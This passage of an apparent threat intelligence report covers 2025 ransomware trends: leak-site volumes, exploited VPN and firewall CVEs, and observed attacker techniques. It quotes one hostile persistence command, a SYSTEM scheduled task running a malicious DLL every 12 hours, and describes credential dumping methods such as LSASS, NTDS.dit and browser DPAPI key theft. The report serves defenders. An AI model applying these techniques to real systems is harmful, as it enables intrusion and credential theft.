<p><span>Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, which is exemplified by the proliferation of the ransomware-as-a-service (RaaS) business model. While ransomware remains a dominant threat due to the volume of activity and the potential for serious operational disruptions, we have observed multiple indicators that suggest the overall profitability of ransomware operations is in decline. This trend is likely the result of multiple factors, including improved cybersecurity practices, increased ability of organizations to recover, and declining ransom payment amounts and rates. Further, numerous disruptions have impacted the ransomware ecosystem in recent years, from external forces like law enforcement operations to internal conflict between actors; both have led to the disappearance or significant debilitation of previously prolific RaaS groups like LockBit, ALPHV, Basta, and RansomHub. However, despite these shakeups, the well-established Qilin and Akira RaaS brands rose up to fill the vacuum, leading to a record high number of victims posted to data leak sites (DLS) in 2025 (Figure 1).</span></p>
<p><span>This report provides an overview of the ransomware landscape and common tactics, techniques, and procedures (TTPs) directly observed in the 2025 ransomware incidents that Mandiant Consulting responded to. In this analysis, we excluded activity focused only on data theft extortion. Key insights include: </span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>77 percent of analyzed ransomware intrusions included suspected data theft, a notable uptick from 57 percent of incidents in 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In approximately 43% of ransomware intrusions we responded to in 2025, the threat actors were observed targeting virtualization infrastructure, an increase from 29% in 2024.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>REDBIKE was the most frequently deployed ransomware family, accounting for 30 percent of analyzed ransomware incidents.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Several trends from prior years remained consistent, including a decreased use of certain intrusion tools like BEACON and MIMIKATZ and a plateau in the reliance of remote management tools.</span></p>
</li>
</ul>
<p><span>Google Threat Intelligence Group (GTIG) analysis of TTPs relies primarily on data from Mandiant engagements and therefore represents only a sample of global ransomware intrusion activity. These incidents involved the post-compromise deployment of ransomware following network intrusion activity, with the majority of incidents also involving data theft extortion. The impacted organizations were based across the Asia Pacific region, Europe, North America, and South America and within nearly every industry sector. </span></p>
<p><span>While we anticipate ransomware will remain one of the most impactful cyber threats in 2026, the reduction in profits may cause some threat actors to leverage other monetization methods and tactics, such as continuing targeting shifts, further increasing data theft extortion operations, the use of more aggressive extortion tactics, or opportunistically using access to victim environments for secondary monetization mechanisms. </span></p>
<p><span>Recommendations to assist in addressing the threat posed by ransomware are captured in our white paper, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/ransomware-protection-and-containment-strategies"><span>Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment</span></a>.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig1.max-1000x1000.png" alt="Top 10 DLS in 2025 and associated ransomware families">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 1: Top 10 DLS in 2025 and associated ransomware families</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>2025 Ransomware Landscape </span></h3>
<p><span>In 2025, the ransomware landscape became increasingly crowded, with a record high number of unique DLS with at least one post. The growing pool of ransomware actors engaging in extortion operations combined with persistent targeted efforts by law enforcement and enhanced organizational security has likely shrunk profit margins for ransomware operators in recent years. In response, threat actors appear to be adopting new strategies from who they target to the technologies they use. This evolution has included an apparent increase in targeting smaller organizations, and a possible focus on data theft extortion without ransomware deployment. Furthermore, threat actors are incorporating artificial intelligence (AI) into aspects of their operations (e.g., negotiations) and leveraging Web3 technologies to bolster the resilience of their infrastructure. While we see expansions in these aspects, internal and external disruptions seen in recent years have prompted some threat actors to become more cautious resulting in more rigorous vetting of potential partners. We expect ransomware actors to continue to adjust and evolve their tactics in an attempt to maintain some level of success or regain the levels of profitability they reached historically.</span></p>
<p><span>2025 marked a record year for the number of posts on DLS, with the total number of posts surpassing that of 2024 by almost 50%. Despite these record setting numbers, we caution against relying solely on DLS data to ascertain the overall volume of ransomware activity. Threat actors typically only create DLS posts for victims that have refused to initiate or complete extortion negotiations. Public reporting </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025#payments" rel="noopener" target="_blank"><span>indicates</span></a><span> that ransom payment rates have been declining, which could, at least partially, fuel the steady increase of posts on shaming sites. It can also be difficult to differentiate between DLS posts associated with data theft-only operations and those that also include ransomware deployment. For example, threat actors associated with the CL0P DLS continue to occasionally deploy ransomware but have shifted primarily to data-theft-extortion-only operations. So while CL0P was the third most prolific DLS in 2025, the vast majority of incidents associated with these posts did not involve ransomware. We have also observed numerous instances of threat actors, such as those associated with BABUK 2.0, fabricating and exaggerating claims as well as reposting claims that would at least slightly inflate victim counts. Finally, not all claims are of equal significance. For example, between December 2024 and January 2025, FUNKSEC was the highest volume DLS; however, many of the associated incidents appeared to be lower impact events involving compromising websites for data theft extortion.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig2.max-1000x1000.png" alt="Volume of posts and unique data leak sites from 2020 through 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 2: Volume of posts and unique data leak sites from 2020 through 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Although ransomware has historically been highly lucrative, recent disruptions and enhanced organizational security may be impacting these profits. Public reporting indicates that both ransom payment rates and average ransom demands are decreasing. In February 2026, Coveware </span><a href="https://www.coveware.com/blog/2026/2/3/mass-data-exfiltration-campaigns-lose-their-edge-in-q4-2025" rel="noopener" target="_blank"><span>reported</span></a><span> that ransom payment rates have generally decreased over the past few years, reaching a historic low in Q4 2025. Similarly, in June 2025, Sophos </span><a href="https://assets.sophos.com/X24WTUEQ/at/9brgj5n44hqvgsp5f5bqcps/sophos-state-of-ransomware-2025.pdf" rel="noopener" target="_blank"><span>reported</span></a><span> that the average ransom demand has dropped by one-third during the last year, to $1.34 million in 2025 from $2 million in 2024. Public reporting further suggests that organizations that have been impacted by ransomware are able to recover more easily, which also likely contributes to reduced ransom payments. For example, in February 2025, Unit 42 </span><a href="https://www.paloaltonetworks.com/engage/unit42-2025-global-incident-response-report" rel="noopener" target="_blank"><span>reported</span></a><span> that companies have improved their ability to recover from ransomware incidents; nearly half of ransomware victims were able to restore from backup in 2024 compared to around 28% in 2023 and only 11% in 2022.</span></p>
<p><span>Improvements in organizational security and the growing ability of victims to recover from ransomware attacks may be leading some adversaries to view data theft as a more reliable method for securing payments. In intrusions investigated by Mandiant, we observed a decline in traditional ransomware deployment coinciding with a rise in data theft extortion. Further, some RaaS programs are providing data-theft-extortion-only options in addition to ransomware, which may reflect demand from their customer base. It is also plausible that more robust security posture, particularly at larger organizations, is forcing threat actors to adjust their targeting to focus on a higher volume of attacks targeting smaller organizations with less mature security programs. Analysis of organization size (based on estimated number of employees, when available) of victims posted on DLS indicates threat actors have shifted away from larger organizations and toward smaller organizations (Figure 3). Threat actors have directly commented on this trend. For example, in leaked April and May 2024 chats, a Basta actor theorized that targeting smaller company networks would be more effective compared to "normal networks."</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig3.max-1000x1000.png" alt="Percentage of DLS posts for victims with an estimated company size of less than 200 employees">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="w4gzu">Figure 3: Percentage of DLS posts for victims with an estimated company size of less than 200 employees</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>During 2025, numerous disruptive events impacted the ransomware ecosystem, including both a range of law enforcement and government actions as well as threat actor-related data leaks and disputes, at least some of which appear to be the result of turmoil amongst threat actors (Figure 4). Not only did many of these events result in direct disruption such as arrests, seizures, and sanctions, but some also forced threat actors to shift TTPs and provided valuable insights to security researchers on the inner workings and individuals behind some ransomware operations. Yet the dominance of long-standing Qilin and Akira brands in 2025 demonstrate the resilience of ransomware actors and their ability to fill voids following takedowns and exit scams of competing RaaS operators. There are some indications that the overall instability in the ransomware threat landscape, coupled with pressure from law enforcement, have caused ransomware teams to increase their operational security, which has translated into more rigorous vetting of potential affiliates. We've also seen some private or semi-private offerings gain prominence. For example, 2025 marked the first time in four years that one of the top two most prolific RaaS operations was not public; while Akira appears to have affiliates, they do not have a public advertisement for their operations.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig4.max-1000x1000.png" alt="Key disruptive events impacting the ransomware landscape">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 4: Key disruptive events impacting the ransomware landscape</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>In 2025, ransomware actors continued to evolve their operations by adopting emerging or established technologies to increase the efficiency and efficacy of their operations. Some threat actors are integrating Web3 technologies into their operations, likely as a way to make their infrastructure more resilient to takedown and detection efforts. The Cry0 RaaS claims to leverage Internet Computer Protocol (ICP) blockchain to host negotiation sites via decentralized canister smart contracts, enabling clearnet access without requiring TOR while DEADLOCK ransomware has leveraged Polygon smart contracts in order to store and rotate C2 infrastructure. We have also seen threat actors incorporating AI-features into their RaaS offerings: the GLOBAL RaaS reportedly has an AI-assisted chat that provides victim analysis and assists with communications, CHAOS purportedly includes a "built-in AI chatbot," although its specific use is unclear, while BERT allegedly uses AI-based data analysis to identify victim pressure points. Finally, we have observed twice the number of ransomware families that were capable of running on both Windows and Linux systems compared to 2024. This could suggest that threat actors are shifting toward cross-platform ransomware rather than creating multiple, separate variants to support their operations.</span></p>
<h3><span>Commonly Observed Tactics, Techniques, and Procedures</span></h3>
<p><span>The following sections discuss trends in the TTPs observed in post-compromise ransomware deployment incidents, organized into the corresponding stages of GTIG's attack lifecycle model (Figure 5). The TTPs outlined in this section were observed at Mandiant-led ransomware investigations during 2025.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig5.max-1000x1000.png" alt="Attack lifecycle associated with 2025 ransomware incidents">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 5: Attack lifecycle associated with 2025 ransomware incidents</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Initial Access</span></h4>
<p><span>During 2025, the most commonly identified initial access vector in ransomware incidents was the exploitation or suspected exploitation of vulnerabilities, accounting for a third of incidents, followed by web compromise, stolen credentials, and bruteforce attacks (Figure 6). Notably, while voice phishing was a commonly leveraged tactic in several high profile data theft extortion campaigns, it was not observed in ransomware incidents. This year we included suspected initial access vectors in our analysis to provide a more holistic view, given that some vectors can be more difficult to verify. For example, it can be difficult to confirm the use of stolen credentials, given that the credentials may have been harvested in a separate incident that occurred weeks prior or even on a personal device. Conversely, bruteforce attacks tend to generate many log entries that can be used to confirm the vector.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Throughout 2025 we observed ransomware operators leveraging a wide range of exploits for initial access (Table 1). While the majority of observed or suspected exploitation activity involved vulnerabilities disclosed prior to 2025, we observed multiple indicators that at least some ransomware actors were leveraging </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"><span>zero-day exploits</span></a><span> in their operations.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In the majority of instances where exploits were used or suspected, the threat actors targeted vulnerabilities in common VPNs and firewalls such as Fortinet (CVE-2024-55591, CVE-2024-21762, and CVE-2019-6693), SonicWall (CVE-2024-40766), Palo Alto (CVE-2024-3400), and Citrix (CVE-2023-4966).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We also observed malicious actors successfully exploit a variety of other exposed services, including Veritas Backup Exec, Zoho ManageEngine, Microsoft Sharepoint, and SAP Netweaver.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>We observed evidence that multiple ransomware and/or data theft extortion operations leveraged zero-day vulnerabilities for initial access throughout the year.</span></p>
</li>
<ul>
<li aria-level="3">
<p role="presentation"><span>During mid-July 2025, an UNC6357 actor attempted to exploit Microsoft Sharepoint vulnerabilities CVE-2025-53770 and CVE-2025-53771 to gain access to the victim's environment and ultimately deploy LOCKBIT.WARLOCK. While this was observed after disclosure of the vulnerability, we observed evidence—including log data and public </span><a href="https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/" rel="noopener" target="_blank"><span>reporting</span></a><span>—suggesting the same actor attempted to exploit the same vulnerability as a zero-day.</span></p>
</li>
<li aria-level="3">
<p role="presentation"><span>In August 2025, GTIG assessed with high confidence that UNC2165 leveraged a zero-day exploit for CVE-2025-8088 to deploy MYTHICAGENT.</span></p>
</li>
<li aria-level="3">
<p role="presentation"><span>While the observed incidents did not involve ransomware deployment, threat actors associated with the CL0P DLS may have </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation"><span>exploited</span></a><span> CVE-2025-61882 as a zero-day against Oracle EBS environments. The CL0P DLS has been associated with multifaceted extortion operations involving CLOP ransomware; however, it is primarily associated with data theft extortion operations rather than ransomware deployment.</span></p>
</li>
</ul>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed multiple threat clusters leverage malvertising and/or search engine optimization (SEO) tactics to distribute malware payloads for initial access, including both ransomware operators themselves and initial access partners that ultimately led to follow-on ransomware intrusions. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed multiple UNC6016 malware distribution operations leverage malvertising to distribute malware payloads masquerading as legitimate software tools such as PuTTY to gain initial access. At least a portion of observed UNC6016 access operations ultimately lead to NITROGEN or RHYSIDA ransomware deployments.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>UNC2465 routinely leveraged malvertising and/or SEO techniques to distribute SMOKEDHAM payloads masquerading as RVTOOLs installers.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>While less frequent this year, many threat actors continued to rely on stolen credentials for initial access. In 21% of intrusions where the initial access vector was identified, the threat actor leveraged compromised legitimate credentials to access the victim environment, typically involving authentication to a victim's VPN or a Remote Desktop Protocol (RDP) login. While the source of stolen credentials cannot always be determined, actors can obtain them via numerous techniques including purchasing credentials from underground forums or using credentials exposed in infostealer logs.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We continued to see a subset of actors leveraging bruteforce attacks against victims' VPNs. In one incident involving ransomware that identified itself as Daixin, the threat actor conducted periodic bruteforce attacks against various VPN user accounts over the course of nearly a year before successfully gaining initial access.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>We observed multiple intrusions where the ransomware operator gained access to the victim through an intermediary network. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed multiple disparate ransomware operations that leveraged network access to subsidiaries of victims to subsequently access the victim's network. In one instance the threat actor leveraged access to the subsidiary to bruteforce access to the victim's VPN.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a separate incident, the threat actor leveraged a VPN connection owned by a third-party vendor to access an operational technology (OT) system within the victim's environment.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one intrusion leading to CLOP ransomware deployment, UNC5833 gained access from an initial access partner who impersonated a helpdesk user to social engineer an employee via a Microsoft Teams chat session to install Quick Assist. While we observed limited use of social engineering by ransomware operators during 2025 in incidents we observed, it remained a popular technique among financially motivated intrusion actors more broadly.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2025-ransomware-trends-fig6.max-1000x1000.png" alt="Initial intrusion vectors">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="fy140">Figure 6: Initial intrusion vectors</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Vendor</span></strong></p>
</td>
<td>
<p><strong><span>Product</span></strong></p>
</td>
<td>
<p><strong><span>CVE</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS / FortiProxy</span></p>
</td>
<td>
<p><span>CVE-2024-21762</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Veritas</span></p>
</td>
<td>
<p><span>Backup Exec</span></p>
</td>
<td>
<p><span>CVE-2021-27877</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Veritas</span></p>
</td>
<td>
<p><span>Backup Exec</span></p>
</td>
<td>
<p><span>CVE-2021-27878</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Zoho</span></p>
</td>
<td>
<p><span>ManageEngine ADSelfService Plus</span></p>
</td>
<td>
<p><span>CVE-2021-40539</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS / FortiProxy</span></p>
</td>
<td>
<p><span>CVE-2024-55591</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Fortinet</span></p>
</td>
<td>
<p><span>FortiOS</span></p>
</td>
<td>
<p><span>CVE-2019-6693</span></p>
</td>
</tr>
<tr>
<td>
<p><span>SonicWall</span></p>
</td>
<td>
<p><span>SonicOS</span></p>
</td>
<td>
<p><span>CVE-2024-40766</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Citrix</span></p>
</td>
<td>
<p><span>NetScaler</span></p>
</td>
<td>
<p><span>CVE-2023-4966</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>SharePoint</span></p>
</td>
<td>
<p><span>CVE-2025-53771</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Microsoft</span></p>
</td>
<td>
<p><span>SharePoint</span></p>
</td>
<td>
<p><span>CVE-2025-53770</span></p>
</td>
</tr>
<tr>
<td>
<p><span>SAP</span></p>
</td>
<td>
<p><span>Netweaver</span></p>
</td>
<td>
<p><span>CVE-2025-31324</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Palo Alto</span></p>
</td>
<td>
<p><span>PAN-OS GlobalProtect</span></p>
</td>
<td>
<p><span>CVE-2024-3400</span></p>
</td>
</tr>
<tr>
<td>
<p><span>CrushFTP</span></p>
</td>
<td>
<p><span>CrushFTP</span></p>
</td>
<td>
<p><span>CVE-2025-31161</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 1: <span>Vulnerabilities likely leveraged for initial access in 2025 ransomware incidents</span></span></div></div>
<div class="block-paragraph_advanced"><h4><span>Establish Foothold and Maintain Presence</span></h4>
<p><span>Once inside victim environments, threat actors engaged in many different techniques to establish a foothold and maintain presence, including leveraging valid credentials, tunnelers, backdoors, or legitimate remote access tools. Threat actors continued to use remote management tools to support both these phases of the attack lifecycle, albeit at slightly lower rates than 2024.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Ransomware actors consistently relied on compromised credentials to establish a foothold in victim environments. </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>Once authenticated to network services, they also often used these credentials to provision or modify highly privileged accounts to maintain access. For example, in a RIFTTEAR incident, the threat actor authenticated via Kerberos to a privileged system, provisioned an AD domain user, and added the account to a high-privileged group. We also saw multiple threat actors change passwords to root accounts on ESXi hosts.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, an increased number of threat actors adopted tunnelers to support these phases compared to 2024 observations. Observed tunnelers included publicly available offerings such as PYSOXY, CHISEL, CLOUDFLARED, RPIVOT, and REVSOCKS.CLIENT alongside seemingly private tunnelers like LIONSHARE, VIPERTUNNEL, and BLUNDERBLIGHT.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In a LOCKBIT.WARLOCK incident, the exploitation of a Microsoft SharePoint vulnerability enabled remote code execution, granting the access required to install CLOUDFLARED from Github via the Windows msiexec command-line utility, establishing an outbound-only C2 channel.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>A subset of threat actors deployed backdoors—including CORNFLAKE.V3.JAVASCRIPT, SQUIDGATE, FIREHAWK, HAVOCDEMON, and SMOKEDHAM—to establish a foothold.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>UNC6021, a suspected FIN6 threat cluster, used SQUIDGATE's built-in functionality to deploy FIREHAWK, a toehold backdoor written in C. Consistent with FIN6 infections, a social engineering engagement on LinkedIn prompted a user to access a malicious website hosting a ZIP archive containing the BULLZLINK downloader. Once executed, it retrieved a dropper variant of SQUIDSLEEP with an embedded SQUIDGATE payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>In 2025, multiple ransomware actors relied on remote monitoring and management tools (RMMs) for multiple phases of the attack lifecycle. We observed a variety of these legitimate tools abused in incidents, including ANYDESK, SCREENCONNECT, and SPLASHTOP (Table 2). </span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In an UNC2465 incident, several weeks after the initial intrusion, the threat actors installed the TERAMIND RMM alongside Time Doctor. Time Doctor is an employee monitoring tool, which is capable of taking screenshots and screen recordings of the system as well as track website and application usage.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors continued to reduce their reliance on BEACON in ransomware operations; we observed BEACON in around 2% of intrusions, a decrease from an already diminished 11% in 2024. However, multiple threat clusters used other post-exploitation frameworks like AdaptixC2 (ADAPTAGENT), Exploration C2 (EXPLORATIONC2), or MYTHIC.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In an UNC2165 RANSOMHUB incident, the threat actors used COM hijacking as a persistence mechanism for MYTHIC. UNC2165 created MYTHIC in the "Temp" folder, renamed it to "msedge.dll," and modified the registry key for InprocServer32 to point to the MYTHIC payload.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>Threat actors often used native Windows features to create services and register scheduled tasks to programmatically and recurrently execute malware, such as backdoors or tunnelers. For example, in a RHYSIDA incident, threat actors registered a scheduled task to run the LIONSHARE tunneler every 12 hours (Figure 7).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>In a TridentLocker-branded incident, the threat actors uploaded WAVECALL, a downloader implemented as a .NET assembly, to a victim server running CrushFTP. They modified the command-line instruction used for processing file previews, replacing the configured executable paths for ImageMagick and ExifTool utilities with the WAVECALL assembly, thereby executing it whenever a file preview operation was initiated. The actors later reverted this configuration and updated the command-line instruction to execute a Base64-encoded PowerShell script to deploy a follow-on payload.</span></p>
</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/Create /SC MINUTE /MO 720 /TN Reg /TR "C:\Windows\System32\rundll32.exe C:\windows\system32\config\red.dll Test" /ru system</code></pre>
<p><span>Figure 7: Scheduled task for LIONSHARE</span></p></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><span>ANYDESK</span></p>
</td>
<td>
<p><span>ATERA</span></p>
</td>
<td>
<p><span>CHROMEREMOTEDESKTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>DAMEWARE</span></p>
</td>
<td>
<p><span>DWAGENT</span></p>
</td>
<td>
<p><span>MESHAGENT</span></p>
</td>
</tr>
<tr>
<td>
<p><span>RUSTDESK</span></p>
</td>
<td>
<p><span>SCREENCONNECT</span></p>
</td>
<td>
<p><span>SPLASHTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><span>TERAMIND</span></p>
</td>
<td> </td>
<td> </td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<span>Table 2: Legitimate remote access tools used to establish a foothold and maintain a presence</span></div></div>
<div class="block-paragraph_advanced"><h4><span>Escalate Privileges</span></h4>
<p><span>Gaining access to highly privileged accounts is a critical step for ransomware actors as it enables further stages of the attack, such as disabling AV software, deleting backups, and deploying ransomware across the network. Threat actors continue to rely on a variety of privilege escalation tools and techniques, including leveraging MIMIKATZ, dumping credentials stored by the Windows operating system, and abusing Active Directory (AD).</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>We observed threat actors leverage MIMIKATZ in approximately 18% of ransomware intrusions in 2025, demonstrating a slight, but continued decline in its overall use in recent years dropping from use in 20% of all ransomware intrusions in 2024. Notably, we observed a decline in other publicly available privilege escalation and credential stealing tools as well; for example, we did not observe LAZAGNE in any ransomware intrusions in 2025, a reduction from 2% of intrusions in 2024, 4% in 2023, and 6% in 2022.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Consistent with recent years, throughout 2025 threat actors used a myriad of techniques to target Windows authentication systems to gain access to privileged accounts.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>We observed threat actors frequently attempting to obtain credentials stored by Windows systems by dumping the Local Security Authority Subsystem Service (LSASS) process memory, copying the Active Directory domain database (NTDS.dit) file, and exporting the Security Account Manager (SAM), SYSTEM, and SECURITY registry hives.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Other observed methods include Kerberoasting, modifying the registry to enable WDigest credentials caching, and the recovery of credentials via the Windows Data Protection API (DPAPI).</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors routinely elevated privileges of compromised and actor-provisioned accounts by adding them to local and domain administrator groups and/or granting the accounts additional privileges such as SeRemoteInteractiveLogonRight, SeDebugPrivilege, SeLoadDriverPrivilege, and SeBackupPrivilege.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In some intrusions, threat actors abused AD roles to obtain elevated privileges through a variety of means, including DCSync replication and the misuse of AD Certificate Services (AD CS). In a MEDUSALOCKER.V2 incident, the threat actors executed the "Move-ADDirectoryServerOperationMasterRole" cmdlet to transfer Flexible Single Master Operation (FSMO) roles from the victim's AD domain controller to a suspected rogue domain controller.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>We observed multiple threat actors attempt to harvest credentials from various internal sources, including backup tools, browsers, password managers, and credentials stored in cleartext.</span></p>
</li>
<ul>
<li aria-level="2">
<p role="presentation"><span>In approximately 10% of intrusions we observed threat actors targeting Veeam Backup &amp; Replication for credential harvesting, which is consistent with activity observed in 2024. Multiple threat actors used the publicly available Veeam-Get-Creds.ps1 script or custom PowerShell scripts to obtain credentials stored in the Veeam configuration database.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>In a handful of incidents, threat actors targeted Chromium-based browsers to obtain stored credentials. For example, in an UNC2165 RANSOMHUB incident, the threat actors executed inline PowerShell to retrieve and decrypt DPAPI-protected master encryption key from the Local State files of Google Chrome and Microsoft Edge allowing access to stored credentials within the browsers.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>Threat actors accessed or attempted to access common password management tools, including KeePass, Bitwarden, and the Windows Credential Manager. During one UNC2465 intrusion involving AGENDA ransomware, the threat actor accessed a self-hosted Bitwarden server and exported and exfiltrated the contents of the vault database.</span></p>
</li>
<li aria-level="2">
<p role="presentation"><span>During a REDBIKE ransomware incident, the threat actor likely harvested a cleartext password from a SonicWall appliance, which was also shared with an admin account, granting the actor domain administrator privileges.</span></p>
</li>
</ul>
<li aria-level="1">
<p role="presentation"><span>During one ransomware incident targeting a victim's virtualized environment, the threat actor exploited CVE-2024-37085 to gain administrator access to an ESXi hypervisor.</span></p>
</li>
</ul>
<h4><span>Internal Reconnaissance</span></h4>
